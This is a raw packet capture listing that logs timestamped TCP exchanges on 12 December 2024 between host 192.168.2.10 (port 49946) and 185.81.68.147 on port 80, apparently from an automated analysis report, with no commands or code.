                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.086955070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.087387085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.087553978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.087632895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.088387012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.088543892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.088596106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.089426994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.089561939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.089658976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.090415001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.090548038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.090615034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.091407061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.091480970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.091573954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.092422962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.092551947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.092636108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.093461037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.093545914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.094476938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.094563961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.094594002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.094948053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.095482111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.095593929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.095668077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.096518040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.096616983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.096805096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.097522974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.097620010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.098454952 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.098529100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.098710060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.098759890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.099579096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.099673986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.099750042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.100608110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.100802898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.101572037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.101635933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.101665974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.102247000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.102575064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.102763891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.102861881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.103596926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.103710890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.103795052 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.104777098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.104840994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.105072021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.105674982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.105762959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.105859995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.106645107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.106775999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.106836081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.107636929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.107717037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.107779980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.108639956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.108762980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.108834028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.109698057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.109853983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.109926939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.110688925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.110831022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.110951900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.111711025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.111901999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.111973047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.112718105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.112736940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.112792969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.113733053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.113883018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.113943100 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.114764929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.114880085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.114950895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.115772009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.115884066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.115981102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.116769075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.116897106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.116997004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.117795944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.117911100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.117978096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.118827105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.118957043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.119040012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.119818926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.119944096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.120044947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.120825052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.120987892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.121110916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.121850014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.121902943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.121975899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.122848988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.122973919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.123034954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.123872042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.123995066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.124062061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.124881983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.124984980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.125055075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.125943899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.126066923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.126122952 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.126934052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.197227001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.266360998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.266393900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.266482115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.266792059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.267003059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.267054081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.267076015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.268002033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.268105030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.268110991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.269059896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.269117117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.269288063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.270107985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.270160913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.270199060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.271364927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.271384001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.271424055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.272120953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.272177935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.272208929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.273080111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.273132086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.273179054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.274111986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.274171114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.274173021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.275099993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.275158882 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.275187016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.276141882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.276222944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.276252031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.277196884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.277266979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.277306080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.278145075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.278206110 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.278273106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.279237986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.279284954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.279472113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.280215025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.280261993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.280320883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.281261921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.281348944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.281358957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.282231092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.282284021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.282321930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.283250093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.283301115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.283364058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.284251928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.284302950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.284370899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.285365105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.285418034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.285454988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.286421061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.286468983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.286493063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.287328005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.287377119 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.287409067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.288311958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.288351059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.288424015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.289328098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.289371967 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.289530039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.290334940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.290375948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.290425062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.291347027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.291390896 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.291440964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.292356968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.292401075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.292654991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.293436050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.293513060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.293520927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.294460058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.294492006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.294513941 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.295589924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.295629025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.295636892 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.296689034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.296744108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.296772003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.297508001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.297558069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.297575951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.298466921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.298513889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.298624992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.299530029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.299576998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.299738884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.300491095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.300543070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.300604105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.301561117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.301611900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.301675081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.302608967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.302649021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.302721024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.303610086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.303646088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.303697109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.304574966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.304615974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.304693937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.305593967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.305634975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.305664062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.306586027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.306623936 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.306696892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.307583094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.307624102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.307674885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.308654070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.308693886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.308830976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.309676886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.309720039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.309854031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.310709953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.310746908 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.310821056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.311719894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.311755896 CET4994680192.168.2.10185.81.68.147
